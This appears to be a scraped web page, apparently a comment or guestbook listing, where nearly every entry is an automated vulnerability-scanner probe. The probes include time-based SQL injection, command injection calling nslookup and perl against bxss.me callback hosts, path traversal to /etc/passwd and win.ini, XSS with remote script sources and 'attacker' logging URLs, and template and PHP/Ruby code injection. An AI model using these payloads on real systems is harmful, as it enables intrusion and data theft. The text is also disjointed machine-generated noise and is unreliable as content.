19/04/2022 02:54
555
h
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
19/04/2022 02:54
555
1
1
19/04/2022 02:54
${9999853+10000037}
1
1
19/04/2022 02:54
555<esi:include src="http://bxss.me/rpb.png"/>
$
${10000233+9999568}
19/04/2022 02:54
555
1
1<esi:include src="http://bxss.me/rpb.png"/>
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
Ẩn danh
19/04/2022 02:54
555
1
1
19/04/2022 02:54
../555
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
../../../../../../../../../../../../../../windows/win.ini
1
1
19/04/2022 02:54
../../../../../../../../../../../../../../etc/passwd
.
../1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
.
../../../../../../../../../../../../../../windows/win.ini
19/04/2022 02:54
555
.
../../../../../../../../../../../../../../etc/passwd
19/04/2022 02:54
555
1
1
19/04/2022 02:54
h6e3azf0
E
EB8T9X2R
19/04/2022 02:54
555
1
1
19/04/2022 02:54
;(nslookup hitgvsgevyavqcc04b.bxss.me||perl -e "gethostbyname('hitgvsgevyavqcc04b.bxss.me')")|(nslookup hitgvsgevyavqcc04b.bxss.me||perl -e "gethostbyname('hitgvsgevyavqcc04b.bxss.me')")&(nslookup hitgvsgevyavqcc04b.bxss.me||perl -e "gethostbyname('hitgvsgevyavqcc04b.bxss.me')")
1
1
19/04/2022 02:54
`(nslookup hitcbkfglmdhk56eec.bxss.me||perl -e "gethostbyname('hitcbkfglmdhk56eec.bxss.me')")`
1
1
19/04/2022 02:54
|(nslookup hituumaifkkbgbd985.bxss.me||perl -e "gethostbyname('hituumaifkkbgbd985.bxss.me')")
1
1
19/04/2022 02:54
&(nslookup hitvezbewkxwd7a267.bxss.me||perl -e "gethostbyname('hitvezbewkxwd7a267.bxss.me')")&'\"`0&(nslookup hitvezbewkxwd7a267.bxss.me||perl -e "gethostbyname('hitvezbewkxwd7a267.bxss.me')")&`'
1
1
19/04/2022 02:54
$(nslookup hitxeuuossrhy2a65f.bxss.me||perl -e "gethostbyname('hitxeuuossrhy2a65f.bxss.me')")
1
1
19/04/2022 02:54
(nslookup hitmvntvaeivv961c4.bxss.me||perl -e "gethostbyname('hitmvntvaeivv961c4.bxss.me')")
1
1
19/04/2022 02:54
|echo xpqhje$()\ qekwpk\nz^xyu||a #' |echo xpqhje$()\ qekwpk\nz^xyu||a #|" |echo xpqhje$()\ qekwpk\nz^xyu||a #
1
1
19/04/2022 02:54
&echo jblgbh$()\ ppurbk\nz^xyu||a #' &echo jblgbh$()\ ppurbk\nz^xyu||a #|" &echo jblgbh$()\ ppurbk\nz^xyu||a #
1
1
19/04/2022 02:54
echo mhyyed$()\ bcufke\nz^xyu||a #' &echo mhyyed$()\ bcufke\nz^xyu||a #|" &echo mhyyed$()\ bcufke\nz^xyu||a #
1
1
19/04/2022 02:54
555
`
`(nslookup hituduidkzyny84af6.bxss.me||perl -e "gethostbyname('hituduidkzyny84af6.bxss.me')")`
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
|
|(nslookup hityzrudjggtf7a4f2.bxss.me||perl -e "gethostbyname('hityzrudjggtf7a4f2.bxss.me')")
19/04/2022 02:54
555
1
1
19/04/2022 02:54
@@lpLzx
$
$(nslookup hittwudthipiz2236f.bxss.me||perl -e "gethostbyname('hittwudthipiz2236f.bxss.me')")
19/04/2022 02:54
555
(
(nslookup hithdgbhzxhqs7848a.bxss.me||perl -e "gethostbyname('hithdgbhzxhqs7848a.bxss.me')")
19/04/2022 02:54
555
|
|echo txyxno$()\ tmradb\nz^xyu||a #' |echo txyxno$()\ tmradb\nz^xyu||a #|" |echo txyxno$()\ tmradb\nz^xyu||a #
19/04/2022 02:54
555
&
&echo tjwqtm$()\ tlhfyb\nz^xyu||a #' &echo tjwqtm$()\ tlhfyb\nz^xyu||a #|" &echo tjwqtm$()\ tlhfyb\nz^xyu||a #
19/04/2022 02:54
555
1
1
19/04/2022 02:54
1'"
e
echo svtqyd$()\ pxccim\nz^xyu||a #' &echo svtqyd$()\ pxccim\nz^xyu||a #|" &echo svtqyd$()\ pxccim\nz^xyu||a #
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1
19/04/2022 02:54
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1
19/04/2022 02:54
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
19/04/2022 02:54
6w1HsWYr')) OR 503=(SELECT 503 FROM PG_SLEEP(15))--
/
/../../../../../../../../../../windows/system32/BITSADMIN.exe
19/04/2022 02:54
555
1
1
19/04/2022 02:54
ungycsZf') OR 492=(SELECT 492 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:54
8PJ1pvMC' OR 768=(SELECT 768 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:54
-1)) OR 327=(SELECT 327 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:54
"+response.write(9937018*9679138)+"
1
1
19/04/2022 02:54
-5) OR 573=(SELECT 573 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:54
-5 OR 178=(SELECT 178 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:54
'+response.write(9937018*9679138)+'
1
1
19/04/2022 02:54
rJEjBV8v')); waitfor delay '0:0:15' --
1
1
19/04/2022 02:54
response.write(9937018*9679138)
1
1
19/04/2022 02:54
fxt098RI'); waitfor delay '0:0:15' --
"
"+response.write(9836178*9534355)+"
19/04/2022 02:54
555
1
1
19/04/2022 02:54
mU5Kz8EK'; waitfor delay '0:0:15' --
1
1
19/04/2022 02:54
1 waitfor delay '0:0:15' --
1
1
19/04/2022 02:54
-1)); waitfor delay '0:0:15' --
1
1
19/04/2022 02:54
-1); waitfor delay '0:0:15' --
1
1}body{acu:Expre/**/SSion(gesS(9564))}
19/04/2022 02:54
555
'
'+response.write(9836178*9534355)+'
19/04/2022 02:54
555
1
1
19/04/2022 02:54
-1; waitfor delay '0:0:15' --
1
1
19/04/2022 02:54
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1
19/04/2022 02:54
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
19/04/2022 02:54
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
1
19/04/2022 02:54
if(now()=sysdate(),sleep(15),0)
r
response.write(9836178*9534355)
19/04/2022 02:54
555
1
1
19/04/2022 02:54
-1" OR 2+92-92-1=0+0+0+1 --
1
1
19/04/2022 02:54
-1' OR 2+81-81-1=0+0+0+1 or 'nL7XoSfu'='
1
1
19/04/2022 02:54
-1' OR 2+721-721-1=0+0+0+1 --
1
1
19/04/2022 02:54
-1 OR 2+659-659-1=0+0+0+1
1
1
19/04/2022 02:54
-1 OR 2+40-40-1=0+0+0+1 --
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
@
@@dBIcC
19/04/2022 02:54
555
1
1'"
19/04/2022 02:54
555
1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
19/04/2022 02:54
555
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
19/04/2022 02:54
555
0
03q5fdnS')) OR 123=(SELECT 123 FROM PG_SLEEP(15))--
19/04/2022 02:54
555
u
uDeqNsAF') OR 694=(SELECT 694 FROM PG_SLEEP(15))--
19/04/2022 02:54
555
6
6pE9osMp' OR 313=(SELECT 313 FROM PG_SLEEP(15))--
19/04/2022 02:54
555
-
-1)) OR 875=(SELECT 875 FROM PG_SLEEP(15))--
19/04/2022 02:54
555
-
-5) OR 740=(SELECT 740 FROM PG_SLEEP(15))--
19/04/2022 02:54
555
-
-5 OR 702=(SELECT 702 FROM PG_SLEEP(15))--
19/04/2022 02:54
555
G
GyK3nAt7')); waitfor delay '0:0:15' --
19/04/2022 02:54
555
W
WguJXe5C'); waitfor delay '0:0:15' --
19/04/2022 02:54
555
E
EbGkqwa6'; waitfor delay '0:0:15' --
19/04/2022 02:54
555
1
1 waitfor delay '0:0:15' --
19/04/2022 02:54
555
-
-1)); waitfor delay '0:0:15' --
19/04/2022 02:54
555
-
-1); waitfor delay '0:0:15' --
19/04/2022 02:54
555
-
-1; waitfor delay '0:0:15' --
19/04/2022 02:54
555
(
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
19/04/2022 02:54
555
0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
19/04/2022 02:54
555
0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
19/04/2022 02:54
555
i
if(now()=sysdate(),sleep(15),0)
19/04/2022 02:54
555
-
-1" OR 2+941-941-1=0+0+0+1 --
19/04/2022 02:54
555
-
-1' OR 2+981-981-1=0+0+0+1 or 'WuDCYRg1'='
19/04/2022 02:54
555
-
-1' OR 2+242-242-1=0+0+0+1 --
19/04/2022 02:54
555
-
-1 OR 2+310-310-1=0+0+0+1
19/04/2022 02:54
555
-
-1 OR 2+817-817-1=0+0+0+1 --
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
1
1
19/04/2022 02:54
555
<
<a HrEF=jaVaScRiPT:>
19/04/2022 02:54
555
"
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
19/04/2022 02:54
555
<
<a HrEF=http://xss.bxss.me></a>
19/04/2022 02:54
555
1
1<input autofocus onfocus=gesS(9821)>
19/04/2022 02:53
555
%
%F6<img acu onmouseover=gesS(98591) //%F6>
19/04/2022 02:53
555
a
acx__${98991*97996}__::.x
19/04/2022 02:53
555
1
1
19/04/2022 02:53
555<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9077></ScRiPt>
a
acx[[${98991*97996}]]xca
19/04/2022 02:53
555
1
1&lt;ScRiPt&gt;gesS(9533)&lt;/sCripT&gt;
19/04/2022 02:52
555
1
1
19/04/2022 02:52
555<ScRiPt >Capq(9682)</ScRiPt>
1
1\u003CScRiPt\gesS(9181)\u003C/sCripT\u003E
19/04/2022 02:52
555
%
%31%3C%53%63%52%69%50%74%20%3E%67%65%73%53%289507%29%3C%2F%73%43%72%69%70%54%3E
19/04/2022 02:52
555
1
1
19/04/2022 02:52
555<ScR<ScRiPt>IpT>Capq(9963)</sCr<ScRiPt>IpT>
a
acx{{98991*97996}}xca
19/04/2022 02:52
555
1
1<img/src=">" onerror=alert(9554)>
19/04/2022 02:52
555
1
1
19/04/2022 02:51
555
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
19/04/2022 02:51
555
1
1<img src=xyz OnErRor=gesS(9458)>
19/04/2022 02:51
555
1
1
19/04/2022 02:51
555<script>Capq(9023)</script>
1
1<img src=//xss.bxss.me/t/dot.gif onload=gesS(9932)>
19/04/2022 02:51
555
1
1
19/04/2022 02:51
555
1
1
19/04/2022 02:51
555<WMSX63>K8P9A[!+!]</WMSX63>
<
<th:t="${acx}#foreach
19/04/2022 02:50
555
1
1
19/04/2022 02:50
555
1
1<body onload=gesS(9673)>
19/04/2022 02:50
555
<
<%={{={@{#{${acx}}%>
19/04/2022 02:50
555
1
1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9756'>
19/04/2022 02:50
555
a
acux7051%C0%BEz1%C0%BCz2a%90bcxuca7051
19/04/2022 02:50
555
1
1
19/04/2022 02:50
555<ScRiPt >Capq(9152)</ScRiPt>
1
1<isindex type=image src=1 onerror=gesS(9755)>
19/04/2022 02:49
555
1
1
19/04/2022 02:49
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
a
acu9530<s1﹥s2ʺs3ʹuca9530
19/04/2022 02:49
555
1
19673489
19/04/2022 02:49
555
'
'"()&%<acx><ScRiPt >370A(9402)</ScRiPt>
19/04/2022 02:48
555
1
1'"()&%<acx><ScRiPt >370A(9630)</ScRiPt>
19/04/2022 02:48
555
1
1
19/04/2022 02:48
<!--
1
1
19/04/2022 02:48
'"
<
<!--
19/04/2022 02:48
555
'
'"
19/04/2022 02:48
555
1
1
19/04/2022 02:48
/xfs.bxss.me
/
/xfs.bxss.me
19/04/2022 02:48
555
1
1
19/04/2022 02:48
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
)
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
19/04/2022 02:48
555
1
1
19/04/2022 02:48
comment/.
1
1
19/04/2022 02:48
comment
c
comment/.
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555&n997589=v923327
c
comment
19/04/2022 02:48
555
1
1
19/04/2022 02:48
'+'A'.concat(70-3).concat(22*4).concat(115).concat(85).concat(108).concat(67)+(require'socket' Socket.gethostbyname('hitrm'+'ulqosdjp9106b.bxss.me.')[3].to_s)+'
1
1
19/04/2022 02:48
"+"A".concat(70-3).concat(22*4).concat(103).concat(69).concat(119).concat(87)+(require"socket" Socket.gethostbyname("hitld"+"sgliymhb50a8e.bxss.me.")[3].to_s)+"
1
1
19/04/2022 02:48
bxss.me/t/xss.html?%00
1
1
19/04/2022 02:48
HttP://bxss.me/t/xss.html?%00
b
bxss.me/t/xss.html?%00
19/04/2022 02:48
555
H
HttP://bxss.me/t/xss.html?%00
19/04/2022 02:48
555
1
1
19/04/2022 02:48
'.print(md5(31337)).'
1
1
19/04/2022 02:48
${@print(md5(31337))}\
1
1
19/04/2022 02:48
${@print(md5(31337))}
1
1
19/04/2022 02:48
";print(md5(31337));$a="
1
1
19/04/2022 02:48
';print(md5(31337));$a='
1
1
19/04/2022 02:48
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
'
'.print(md5(31337)).'
19/04/2022 02:48
555
$
${@print(md5(31337))}\
19/04/2022 02:48
555
$
${@print(md5(31337))}
19/04/2022 02:48
555
"
";print(md5(31337));$a="
19/04/2022 02:48
555
'
';print(md5(31337));$a='
19/04/2022 02:48
555
;
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
19/04/2022 02:48
555
1
1
19/04/2022 02:48
".gethostbyname(lc("hitjq"."ghnkflxp65e87.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(87).chr(113).chr(80)."
1
1
19/04/2022 02:48
'.gethostbyname(lc('hityr'.'xobovnpce10f3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(82).chr(122).chr(74).'
"
".gethostbyname(lc("hitzc"."dhwwjwrd0a324.bxss.me."))."A".chr(67).chr(hex("58")).chr(109).chr(83).chr(108).chr(80)."
19/04/2022 02:48
555
'
'.gethostbyname(lc('hituo'.'oebaiijsf74f5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(85).chr(108).chr(68).'
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
'"()
'
'"()
19/04/2022 02:48
555
Ẩn danh
19/04/2022 02:48
555
1
1
19/04/2022 02:48
^(#$!@#$)(()))******
1
1
19/04/2022 02:48
!(()&&!|*|*|
1
1
19/04/2022 02:48
)
^
^(#$!@#$)(()))******
19/04/2022 02:48
555
!
!(()&&!|*|*|
19/04/2022 02:48
555
)
)
19/04/2022 02:48
555
1
1
19/04/2022 02:48
bxss.me
1
1
19/04/2022 02:48
http://bxss.me/t/fit.txt?.jpg
1
1
19/04/2022 02:48
Http://bxss.me/t/fit.txt
1
1
19/04/2022 02:48
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
b
bxss.me
19/04/2022 02:48
555
h
http://bxss.me/t/fit.txt?.jpg
19/04/2022 02:48
555
H
Http://bxss.me/t/fit.txt
19/04/2022 02:48
555
1
1&n980150=v974714
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555
h
http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg
19/04/2022 02:48
555
1
1
19/04/2022 02:48
${9999179+9999487}
$
${9999769+9999130}
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555<esi:include src="http://bxss.me/rpb.png"/>
1
1
19/04/2022 02:48
555
1
1<esi:include src="http://bxss.me/rpb.png"/>
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555
Ẩn danh
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
../555
1
1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
../../../../../../../../../../../../../../windows/win.ini
1
1
19/04/2022 02:48
../../../../../../../../../../../../../../etc/passwd
1
1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9536></ScRiPt>
19/04/2022 02:48
555
.
../1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
;(nslookup hitcyzgtgownzcab2c.bxss.me||perl -e "gethostbyname('hitcyzgtgownzcab2c.bxss.me')")|(nslookup hitcyzgtgownzcab2c.bxss.me||perl -e "gethostbyname('hitcyzgtgownzcab2c.bxss.me')")&(nslookup hitcyzgtgownzcab2c.bxss.me||perl -e "gethostbyname('hitcyzgtgownzcab2c.bxss.me')")
1
1
19/04/2022 02:48
`(nslookup hitihzblcdklod508a.bxss.me||perl -e "gethostbyname('hitihzblcdklod508a.bxss.me')")`
1
1
19/04/2022 02:48
|(nslookup hitwwywezbzjqf3915.bxss.me||perl -e "gethostbyname('hitwwywezbzjqf3915.bxss.me')")
1
1
19/04/2022 02:48
&(nslookup hitrrvdzzglcc50358.bxss.me||perl -e "gethostbyname('hitrrvdzzglcc50358.bxss.me')")&'\"`0&(nslookup hitrrvdzzglcc50358.bxss.me||perl -e "gethostbyname('hitrrvdzzglcc50358.bxss.me')")&`'
1
1
19/04/2022 02:48
$(nslookup hitkbytfeqgvee5cfa.bxss.me||perl -e "gethostbyname('hitkbytfeqgvee5cfa.bxss.me')")
1
1
19/04/2022 02:48
(nslookup hitnrmpoxfxozeabc3.bxss.me||perl -e "gethostbyname('hitnrmpoxfxozeabc3.bxss.me')")
1
1
19/04/2022 02:48
|echo rmunjw$()\ vhgkpb\nz^xyu||a #' |echo rmunjw$()\ vhgkpb\nz^xyu||a #|" |echo rmunjw$()\ vhgkpb\nz^xyu||a #
1
1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
&echo yafwlm$()\ qywcjz\nz^xyu||a #' &echo yafwlm$()\ qywcjz\nz^xyu||a #|" &echo yafwlm$()\ qywcjz\nz^xyu||a #
1
1
19/04/2022 02:48
acx__${98991*97996}__::.x
1
1
19/04/2022 02:48
echo arxpze$()\ hvddva\nz^xyu||a #' &echo arxpze$()\ hvddva\nz^xyu||a #|" &echo arxpze$()\ hvddva\nz^xyu||a #
.
../../../../../../../../../../../../../../windows/win.ini
19/04/2022 02:48
555
`
`(nslookup hitnukvmdaucb5fca6.bxss.me||perl -e "gethostbyname('hitnukvmdaucb5fca6.bxss.me')")`
19/04/2022 02:48
555
.
../../../../../../../../../../../../../../etc/passwd
19/04/2022 02:48
555
1
1
19/04/2022 02:48
iCLYGaLD
|
|(nslookup hitebwuewymjo46e1c.bxss.me||perl -e "gethostbyname('hitebwuewymjo46e1c.bxss.me')")
19/04/2022 02:48
555
$
$(nslookup hitjlwgmykmld088b3.bxss.me||perl -e "gethostbyname('hitjlwgmykmld088b3.bxss.me')")
19/04/2022 02:48
555
1
1sslXjoW
19/04/2022 02:48
555
(
(nslookup hitajtrreahzcdd597.bxss.me||perl -e "gethostbyname('hitajtrreahzcdd597.bxss.me')")
19/04/2022 02:48
555
|
|echo xzpyxj$()\ qyicxd\nz^xyu||a #' |echo xzpyxj$()\ qyicxd\nz^xyu||a #|" |echo xzpyxj$()\ qyicxd\nz^xyu||a #
19/04/2022 02:48
555
&
&echo flejbh$()\ wlkiej\nz^xyu||a #' &echo flejbh$()\ wlkiej\nz^xyu||a #|" &echo flejbh$()\ wlkiej\nz^xyu||a #
19/04/2022 02:48
555
e
echo dmthcm$()\ sgiltf\nz^xyu||a #' &echo dmthcm$()\ sgiltf\nz^xyu||a #|" &echo dmthcm$()\ sgiltf\nz^xyu||a #
19/04/2022 02:48
555
1
1
19/04/2022 02:48
"+response.write(9876403*9665876)+"
1
1
19/04/2022 02:48
'+response.write(9876403*9665876)+'
1
1
19/04/2022 02:48
/../../../../../../../../../../windows/system32/BITSADMIN.exe
1
1
19/04/2022 02:48
response.write(9876403*9665876)
/
/../../../../../../../../../../windows/system32/BITSADMIN.exe
19/04/2022 02:48
555
"
"+response.write(9933151*9514616)+"
19/04/2022 02:48
555
'
'+response.write(9933151*9514616)+'
19/04/2022 02:48
555
r
response.write(9933151*9514616)
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
@@OESvB
1
1
19/04/2022 02:48
1'"
1
1
19/04/2022 02:48
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1<ScRiPt >gesS(9816)</ScRiPt>
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1
1
19/04/2022 02:48
FpK9lRme')) OR 514=(SELECT 514 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:48
xNOJodz3') OR 655=(SELECT 655 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:48
nD8pzdOb' OR 946=(SELECT 946 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:48
-1)) OR 800=(SELECT 800 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:48
-5) OR 364=(SELECT 364 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:48
-5 OR 791=(SELECT 791 FROM PG_SLEEP(15))--
1
1
19/04/2022 02:48
Wb8ra4cE')); waitfor delay '0:0:15' --
1
1
19/04/2022 02:48
V10jcJgs'); waitfor delay '0:0:15' --
1
1
19/04/2022 02:48
pRFHbqEA'; waitfor delay '0:0:15' --
1
1
19/04/2022 02:48
1 waitfor delay '0:0:15' --
1
1
19/04/2022 02:48
-1)); waitfor delay '0:0:15' --
1
1
19/04/2022 02:48
-1); waitfor delay '0:0:15' --
1
1
19/04/2022 02:48
-1; waitfor delay '0:0:15' --
1
1
19/04/2022 02:48
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1
1
19/04/2022 02:48
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
1
1
19/04/2022 02:48
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
1
1
19/04/2022 02:48
if(now()=sysdate(),sleep(15),0)
1
1
19/04/2022 02:48
-1" OR 2+468-468-1=0+0+0+1 --
1
1
19/04/2022 02:48
-1' OR 2+466-466-1=0+0+0+1 or 'XMYMODJF'='
1
1
19/04/2022 02:48
-1' OR 2+865-865-1=0+0+0+1 --
1
1
19/04/2022 02:48
-1 OR 2+796-796-1=0+0+0+1
1
1
19/04/2022 02:48
-1 OR 2+104-104-1=0+0+0+1 --
1
1
19/04/2022 02:48
555
1
1
19/04/2022 02:48
555
@
@@Q03Cc
19/04/2022 02:48
555
1
1'"
19/04/2022 02:48
555
1
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
19/04/2022 02:48
555
1
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
19/04/2022 02:48
555
V
VPdTFcKN')) OR 533=(SELECT 533 FROM PG_SLEEP(15))--
19/04/2022 02:48
555
4
4LB5kRtV') OR 806=(SELECT 806 FROM PG_SLEEP(15))--
19/04/2022 02:48
555
U
UQqG8ftw' OR 29=(SELECT 29 FROM PG_SLEEP(15))--
19/04/2022 02:47
555
-
-1)) OR 127=(SELECT 127 FROM PG_SLEEP(15))--
19/04/2022 02:47
555
-
-5) OR 798=(SELECT 798 FROM PG_SLEEP(15))--
19/04/2022 02:47
555
-
-5 OR 359=(SELECT 359 FROM PG_SLEEP(15))--
19/04/2022 02:47
555
N
NPhnKtVB')); waitfor delay '0:0:15' --
19/04/2022 02:47
555
q
qXjiaSjb'); waitfor delay '0:0:15' --
19/04/2022 02:47
555
D
Dm0S9rCj'; waitfor delay '0:0:15' --
19/04/2022 02:47
555
1
1 waitfor delay '0:0:15' --
19/04/2022 02:47
555
-
-1)); waitfor delay '0:0:15' --
19/04/2022 02:47
555
-
-1); waitfor delay '0:0:15' --
19/04/2022 02:47
555
-
-1; waitfor delay '0:0:15' --
19/04/2022 02:47
555
(
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
19/04/2022 02:47
555
0
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
19/04/2022 02:47
555
0
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
19/04/2022 02:47
555
i
if(now()=sysdate(),sleep(15),0)
19/04/2022 02:47
555
-
-1" OR 2+166-166-1=0+0+0+1 --
19/04/2022 02:47
555
-
-1' OR 2+21-21-1=0+0+0+1 or 'VrJd1ANR'='
19/04/2022 02:47
555
-
-1' OR 2+801-801-1=0+0+0+1 --
19/04/2022 02:47
555
-
-1 OR 2+533-533-1=0+0+0+1
19/04/2022 02:47
555
-
-1 OR 2+732-732-1=0+0+0+1 --
19/04/2022 02:47
555
1
1
19/04/2022 02:47
555
1
1
19/04/2022 02:47
555
1
1
19/04/2022 02:47
555
1
1
19/04/2022 02:47
acx[[${98991*97996}]]xca
1
1<ScR<ScRiPt>IpT>gesS(9462)</sCr<ScRiPt>IpT>
19/04/2022 02:47
555
1
1<script>gesS(9039)</script>
19/04/2022 02:46
555
1
1
19/04/2022 02:46
acx{{98991*97996}}xca
1
1<WWLKGA>EAJ8B[!+!]</WWLKGA>
19/04/2022 02:46
555
1
1<ScRiPt >gesS(9112)</ScRiPt>
19/04/2022 02:46
555
"
"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")
19/04/2022 02:45
555
1
1
19/04/2022 02:45
555
1
1
19/04/2022 02:44
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
a
acx__${98991*97996}__::.x
19/04/2022 02:43
555
a
acx[[${98991*97996}]]xca
19/04/2022 02:43
555
a
acx{{98991*97996}}xca
19/04/2022 02:42
555
1
1
19/04/2022 02:42
555
1
1
19/04/2022 02:41
555
1
1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>
19/04/2022 02:41
555
1
1
19/04/2022 02:40
<th:t="${acx}#foreach
1
1
19/04/2022 02:40
555
<
<th:t="${acx}#foreach
19/04/2022 02:40
555
1
1
19/04/2022 02:40
555
1
1
19/04/2022 02:40
555
<
<%={{={@{#{${acx}}%>
19/04/2022 02:40
555
1
1
19/04/2022 02:39
<%={{={@{#{${acx}}%>
1
1
19/04/2022 02:39
acux2344%C0%BEz1%C0%BCz2a%90bcxuca2344
1
1
19/04/2022 02:39
acu10523<s1﹥s2ʺs3ʹuca10523
a
acux4035%C0%BEz1%C0%BCz2a%90bcxuca4035
19/04/2022 02:38
555
1
1
19/04/2022 02:38
5559923086
a
acu7816<s1﹥s2ʺs3ʹuca7816
19/04/2022 02:38
555
1
1
19/04/2022 02:37
'"()&%<acx><ScRiPt >Capq(9904)</ScRiPt>
1
19892694
19/04/2022 02:37
555
'
'"()&%<acx><ScRiPt >gesS(9273)</ScRiPt>
19/04/2022 02:37
555
1
1
19/04/2022 02:36
555'"()&%<acx><ScRiPt >Capq(9256)</ScRiPt>
1
1'"()&%<acx><ScRiPt >gesS(9408)</ScRiPt>
19/04/2022 02:36
555
1
1
19/04/2022 02:32
555<adW4E7n<
1
1
19/04/2022 02:32
555<img sRc='http://attacker-9009/log.php?
1
1
19/04/2022 02:31
555<aIDygcl x=9083>
1
1
19/04/2022 02:31
555<ifRAme sRc=9597.com></IfRamE>
1
1
19/04/2022 02:31
555<WQPTHM>J5NOW[!+!]</WQPTHM>
1
1
19/04/2022 02:30
555vCRCt <ScRiPt >wJo2(9495)</ScRiPt>
1
1
19/04/2022 02:30
555}body{acu:Expre/**/SSion(wJo2(9249))}
1
1
19/04/2022 02:29
<a HrEF=jaVaScRiPT:>
1
1
19/04/2022 02:29
<a HrEF=http://xss.bxss.me></a>
1
1
19/04/2022 02:28
555
1
1
19/04/2022 02:28
555<input autofocus onfocus=wJo2(9030)>
1
1
19/04/2022 02:28
555
1
1<aJWjkVJ<
19/04/2022 02:28
555
1
1
19/04/2022 02:28
%F6<img acu onmouseover=wJo2(96621) //%F6>
1
1
19/04/2022 02:28
555
1
1<img sRc='http://attacker-9920/log.php?
19/04/2022 02:27
555
1
1
19/04/2022 02:27
555<a6xFBr3<
1
1<aIq5Wf4 x=9262>
19/04/2022 02:27
555
1
1
19/04/2022 02:27
555&lt;ScRiPt&gt;wJo2(9521)&lt;/sCripT&gt;
1
1<ifRAme sRc=9638.com></IfRamE>
19/04/2022 02:27
555
1
1
19/04/2022 02:26
555<img sRc='http://attacker-9481/log.php?
1
1
19/04/2022 02:26
555\u003CScRiPt\wJo2(9143)\u003C/sCripT\u003E
1
1<WT5F6M>4U900[!+!]</WT5F6M>
19/04/2022 02:26
555
1
1
19/04/2022 02:26
555<akWcS1H x=9274>
1
1
19/04/2022 02:26
555<ifRAme sRc=9952.com></IfRamE>
1
1UeE7v <ScRiPt >YMAK(9897)</ScRiPt>
19/04/2022 02:26
555
1
1
19/04/2022 02:26
